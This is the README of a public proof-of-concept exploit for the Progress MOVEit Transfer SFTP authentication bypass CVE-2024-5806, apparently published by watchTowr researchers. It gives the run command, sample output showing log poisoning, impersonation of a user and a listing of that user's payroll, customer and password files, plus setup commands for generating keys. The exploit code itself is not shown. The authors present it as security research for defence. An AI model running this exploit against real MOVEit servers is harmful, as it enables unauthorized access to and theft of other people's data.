Awesome
CVE-2024-5806
Exploit for Progress MOVEit Transfer CVE-2024-5806. See our blog post at [TBD].
PoC in Action
See --help
for, well, help. A typical run should look like this:
> python CVE-2024-5806.py --target-ip 192.168.1.1 --target-user user2 --ppk id.ppk --pem id
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-2024-5806.py
(*) Progress MoveIT Transfer SFTP Authentication Bypass (CVE-2024-5806)
- Aliz Hammond, watchTowr (aliz@watchTowr.com)
- Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
Note: We (watchTowr) aren't the original discoverers of the bug, we just reproduced it and wrote the exploit
in order to enable proactive protection of client attack surfaces.
We will update with proper credit when available.
CVEs: [CVE-2024-5806]
(*) Poisoning log files multiple times to be sure...
..........OK
(*) Waiting 60 seconds for logs to be flushed to disk
(*) Attempting to authenticate..
(*) Trying to impersonate user2 using the server-side file path 'C:\MOVEitTransfer\Logs\DMZ_WEB.log'
(+) Authentication succeeded.
(+) Listing files in home directory of user user2:
-rw-rw-rw- 1 0 0 1.4M Jun 11 11:39 stocks.xlsx
-rw-rw-rw- 1 0 0 2.4M Jun 13 13:32 customer_list.xlsx
-rw-rw-rw- 1 0 0 2.3M Jun 15 12:16 payroll_Jun.csv
-rw-rw-rw- 1 0 0 1.2M Jan 21 10:03 my_signature.png
-rw-rw-rw- 1 0 0 304 Jun 17 17:29 passwords.txt
Setup
To run the exploit, you'll need a keypair in both PEM and PPK format. On Windows, you can use puttygen
to generate these files. On Linux, you can use openssh
and putty-tools
package. Just hit enter when prompted for a key.
$ sudo apt-get install openssh-client putty-tools
$ puttygen -t rsa -b 2048 -o putty_key.ppk
Enter passphrase to save key:
Re-enter passphrase to verify:
$ puttygen putty_key.ppk -O private-openssh -o id_rsa
Affected Versions
This vulnerability is fixed in Progress MOVEit version 2024.0.2
.
Exploit authors
This exploit was written by Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
Follow watchTowr Labs
For the latest security research follow the watchTowr Labs Team
- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- [blog link TBD]